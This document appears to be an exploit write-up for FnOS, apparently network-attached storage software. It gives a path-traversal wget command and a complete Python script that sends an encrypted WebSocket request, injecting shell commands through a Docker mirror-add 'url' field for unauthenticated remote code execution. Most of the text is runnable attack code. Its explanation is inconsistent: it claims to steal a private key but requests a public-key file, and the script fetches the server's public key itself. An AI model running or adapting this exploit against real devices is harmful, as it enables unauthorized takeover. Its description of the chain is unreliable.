FnOS Vulnerability Chain Reproduction + Privilege Escalation
FnOS
Target Machine: 10.10.10.10
Vulnerability Chain Overview:
Path Traversal → Read arbitrary files (obtain RSA private key)
Use RSA private key to forge encrypted channel → Bypass authentication + Command injection
End result: Unauthorized RCE (Remote Code Execution)
Step 1 – Path Traversal to Read RSA Private Key
The endpoint /app-center-static/serviceicon/myapp/... does not filter path traversal, allowing arbitrary file reads.
Use wget "https://10.10.10.10:8000/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../usr/trim/etc/rsa_public_key.pem" \ -O rsa_private_key.pem --no-check-certificate to output the RSA private key
Step 2 – Use Private Key to Forge Encrypted WebSocket Channel for Command Execution
Using the obtained RSA private key, construct an encrypted client → server data packet and achieve command injection through the url parameter of the appcgi.dockermgr.systemMirrorAdd endpoint.
Below is the complete exploit script
import websocket
import json
import time
import base64
import argparse
import sys
from Cryptodome.PublicKey import RSA
from Cryptodome.Cipher import PKCS1_v1_5, AES
from Cryptodome.Util.Padding import pad
from Cryptodome.Random import get_random_bytes
# --- Target Configuration ---
TARGET_URL = "ws://10.10.10.10:8000/websocket?type=main"
# Attack payload
CMD_TO_EXECUTE = ""
EXPLOIT_PAYLOAD_URL = f"http://10.10.10.10:8000 ; {CMD_TO_EXECUTE} ; /usr/bin/echo "
class TrimEncryptedExploit:
def __init__(self):
self.ws = None
self.si = ""
self.server_pub_key = ""
self.step = 0
def get_reqid(self):
return str(int(time.time() * 100000))
def create_encrypted_packet(self, inner_json_dict):
"""
Construct { "req": "encrypted", ... } packet
"""
try:
# 1. Generate temporary AES-256 Key and IV
aes_key = get_random_bytes(32)
aes_iv = get_random_bytes(16)
# 2. Serialize inner Payload
# Note: separators remove whitespace
inner_data = json.dumps(inner_json_dict, separators=(',', ':')).encode('utf-8')
# 3. AES encrypt Payload (CBC + PKCS7 Padding)
cipher_aes = AES.new(aes_key, AES.MODE_CBC, aes_iv)
encrypted_body = cipher_aes.encrypt(pad(inner_data, AES.block_size))
# 4. RSA encrypt AES Key (using server public key)
# This way the server can decrypt our AES Key with its private key
rsa_key_obj = RSA.import_key(self.server_pub_key)
cipher_rsa = PKCS1_v1_5.new(rsa_key_obj)
encrypted_aes_key = cipher_rsa.encrypt(aes_key)
# 5. Assemble final packet
wrapper = {
"req": "encrypted",
# "reqid": self.get_reqid(), # Outer layer usually doesn't need reqid, uncomment if needed
"iv": base64.b64encode(aes_iv).decode('utf-8'),
"rsa": base64.b64encode(encrypted_aes_key).decode('utf-8'),
"aes": base64.b64encode(encrypted_body).decode('utf-8')
}
return json.dumps(wrapper, separators=(',', ':'))
except Exception as e:
print(f"Encryption construction failed: {e}")
return None
def on_open(self, ws):
print(f"\n[1/2] Connection established, requesting public key...")
# Step 1: Get public key and SI
payload = {
"reqid": self.get_reqid(),
"req": "util.crypto.getRSAPub"
}
ws.send(json.dumps(payload))
self.step = 1
def on_message(self, ws, message):
try:
# Simple parsing
if message.startswith('{'):
data = json.loads(message)
elif message.find('{') > -1:
data = json.loads(message[message.find('{'):])
else:
return
# --- Step 1: Get public key and SI ---
if self.step == 1 and "pub" in data:
self.server_pub_key = data["pub"]
self.si = str(data["si"])
print(f" [1/2] Handshake successful")
print(f" SI: {self.si}")
print(f" Public Key obtained ({len(self.server_pub_key)} bytes)")
# --- Step 2: Send encrypted Exploit ---
self.send_exploit(ws)
self.step = 2
return
# --- Step 2: Receive result ---
if self.step == 2:
print(f"\n [2/2] Received response:\n{json.dumps(data, indent=2)}")
if data.get("result") == "succ" or data.get("errno") == 0:
print(f"\n[+] Attack successful! Command sent through encrypted channel.")
print(f"[+] Check server file: {CMD_TO_EXECUTE}")
else:
print(f"\n[-] Attack failed, error code: {data.get('errno')}")
ws.close()
except Exception as e:
print(f" Exception: {e}")
ws.close()
def send_exploit(self, ws):
print(f"\n[*] Constructing encrypted Exploit packet...")
print(f"[*] Injecting command: {CMD_TO_EXECUTE}")
inner_payload = {
"req": "appcgi.dockermgr.systemMirrorAdd",
"reqid": self.get_reqid(),
"url": EXPLOIT_PAYLOAD_URL,
"name": "EncryptedExploit",
"si": self.si
}
print(f"[*] Inner Payload: {json.dumps(inner_payload)}")
packet = self.create_encrypted_packet(inner_payload)
if packet:
print(f"[>] Sending encrypted packet (Len: {len(packet)})...")
ws.send(packet)
def run(self):
self.ws = websocket.WebSocketApp(TARGET_URL,
on_open=self.on_open,
on_message=self.on_message)
self.ws.run_forever()
if __name__ == "__main__":
print("=== Trim Protocol Encrypted Channel Unauthorized RCE Exploit Tool ===")
exploit = TrimEncryptedExploit()
exploit.run()
|